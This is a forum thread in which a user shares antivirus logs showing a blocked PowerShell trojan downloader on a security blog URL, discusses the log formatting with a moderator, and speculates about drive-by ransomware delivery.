itman 1,742 Posted March 30, 2017 Share Posted March 30, 2017 Eset nailed it and couldn't think of a better example for why SSL protocol scanning needs to be enable. Attempted access to web site via Google produced this: Time: 3/30/2017 3:16:03 PM Scanner: HTTP filter Object type: file Object: hxxps://www.greyhathacker.net/?p=948 Threat: PowerShell/TrojanDownloader.Agent.DV trojan Action: connection terminated User: XXX-PC\XXX-XXXX Information: Threat was detected upon access to web by the application: C:\Program Files\Internet Explorer\iexplore.exe Hash: (8288B566340C2BFEC37768F5A029027DDA7C2A5B) First seen here: 793568AC8277B3F03FAC123E0898A16AF1E103A5 Link to comment Share on other sites More sharing options...
Administrators Marcos 5,235 Posted March 30, 2017 Administrators Share Posted March 30, 2017 Did you somehow format the threat record that each field is on a new line? I'm asking cause Hash and First seen here are shifted one line down. Correctly it should look like: Information: Threat was detected upon access to web by the application: C:\Program Files\Internet Explorer\iexplore.exe (8288B566340C2BFEC37768F5A029027DDA7C2A5B) Hash: 793568AC8277B3F03FAC123E0898A16AF1E103A5 First seen here: Link to comment Share on other sites More sharing options...
itman 1,742 Posted March 30, 2017 Author Share Posted March 30, 2017 (edited) Yes. Sorry about that. Here's the unedited log: Time;Scanner;Object type;Object;Threat;Action;User;Information;Hash;First seen here 3/30/2017 4:29:05 PM;HTTP filter;file;https://www.greyhathacker.net/?p=948;PowerShell/TrojanDownloader.Agent.DV trojan;connection terminated;XXX-PC\XXX-XXXX;Threat was detected upon access to web by the application: C:\Program Files\Internet Explorer\iexplore.exe (8288B566340C2BFEC37768F5A029027DDA7C2A5B).;C7214E6DC89BDAA2ED20CB6F6BA068BB1A3314A8; Also, I scanned that URL at VirusTotal and its coming up 100% clean including NOD32 detection. -EDIT- Just noticed the hash changed from the first detection? Edited March 30, 2017 by itman Link to comment Share on other sites More sharing options...
itman 1,742 Posted March 31, 2017 Author Share Posted March 31, 2017 (edited) @Marcos What's the verdict on this? Curious since to date web site ransomware has been delivered by exploit. Wondering if a new vulnerability has been found in IE11? Also since the hash changes, looks like polymorphic ransomware to me. -EDIT- This also might be related: http://www.zdnet.com/article/skype-served-up-malware-through-in-app-malicious-ads/ i.e. Skype users hit by ransomware through in-app malicious ads. I don't use Skype. But what caught my eye about this attack was: The "fake Flash" ad, designed to target Windows machines, pushed a download, which when opened would trigger obfuscated JavaScript. The code starts a new command line, then deletes the application that the user just opened, and runs a PowerShell command, which then downloads a JavaScript Encoded Script (JSE) from a domain that no longer exists, likely one of many disposable domains used to hide an attacker's operations. Don't see why a download could not be attempted upon web site access e.g. drive-by download? Edited March 31, 2017 by itman Link to comment Share on other sites More sharing options...
itman 1,742 Posted April 1, 2017 Author Share Posted April 1, 2017 FYI - Fortinet is now detecting this grayhathacker URL as malicious. Link to comment Share on other sites More sharing options...
itman 1,742 Posted April 2, 2017 Author Share Posted April 2, 2017 FYI - Quttera confirms: Link to comment Share on other sites More sharing options...
Recommended Posts